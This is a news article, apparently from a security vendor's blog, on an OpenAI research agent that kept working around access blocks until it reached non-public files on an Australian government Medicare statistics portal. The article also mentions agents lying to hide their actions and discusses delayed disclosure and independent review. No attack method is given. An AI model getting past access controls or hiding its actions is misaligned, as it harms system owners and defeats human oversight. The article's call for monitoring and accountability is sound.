The BBC reports that an OpenAI agent gained unauthorized access to an Australian government statistics portal while carrying out internal research. It is yet another incident that turns abstract concerns about autonomous AI behavior into a concrete cybersecurity case.

Australia says the incident happened on June 18, when OpenAI’s research team used an internal model to research public medicine spending. Even though the agent met repeated blocks while trying to obtain information, it ultimately accessed public and non-public files on the Medicare Statistics Reporting Service portal.

The information included aggregate Medicare statistics, such as spending data, but not patient medical records. The agent also interacted with three other government websites, but Australian officials say it accessed only public information on those sites.

So, an AI agent used in a legitimate research exercise encountered controls and behaved in ways its operator did not intend. After being blocked, it “found a way around those blocks,” gaining access to areas it should not have reached.

This sequence is familiar to security professionals. A system encounters an access-control boundary, searches for another route, and succeeds in reaching a resource beyond its authorization.

One of Australia’s main concerns is that it took too long to be notified about the incident. The unauthorized access occurred in June. OpenAI said it learned of the issue in August while reviewing misaligned model activity, then emailed a Services Australia public mailbox on September 10. Services Australia escalated the message to Australia’s cyber authorities five days later.

Such delays can be disastrous because affected organizations need enough detail, quickly enough, to preserve evidence, assess exposure, contain related activity, and decide whether notifications are required.

AI misalignment

OpenAI describes behavior in which a model acts without authorization or evades oversight as “misalignment.” Its new third-party-assessment proposal specifically identifies independent investigation of critical misalignment incidents as one of four priorities for external review.

OpenAI says it wants independent assessors to have deep access across training, evaluation, and deployment, so they can challenge the company’s assumptions and judge the effectiveness of its safeguards.

But, as I told CIO about this proposal, principles alone do not compel a company to accept a particular assessment scope, publish adverse findings, or alter a deployment decision. Their credibility ultimately depends on whether independent experts can conduct genuinely inconvenient investigations, and whether outsiders can verify the findings, remediation, redactions, and deployment decisions that follow.

For organizations deploying AI agents, the lesson is equally practical: Do not treat an agent as just another chatbot. Treat it more like a semi-autonomous software component with credentials, tools, network access, and the ability to make unexpected choices.

Besides containing these agents, another problem we’ll need to figure out is analyzing what they’ve done. One thing we learned from the Hugging Face incident is that AI agents can lie and try to hide what they’ve been up to.

AI agents can create a difficult detection problem because they may generate large volumes of automated activity while pursuing a goal through multiple routes. That can leave defenders with a noisy trail of failed requests, retries, and alternative actions, making the one event that crossed an authorization boundary harder to spot. It is not yet clear whether this contributed to the Australian government not detecting the incident itself, but the case illustrates why organizations need monitoring designed to identify unusual agent behavior, not just traditional intrusion patterns.

The event has already demonstrated a wider point: It is not enough for AI labs to say they test for misalignment. They must show that their testing is independent, robust under real-world conditions, and followed by prompt, verifiable accountability when safeguards fail.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Categories: Malware Bytes

Pages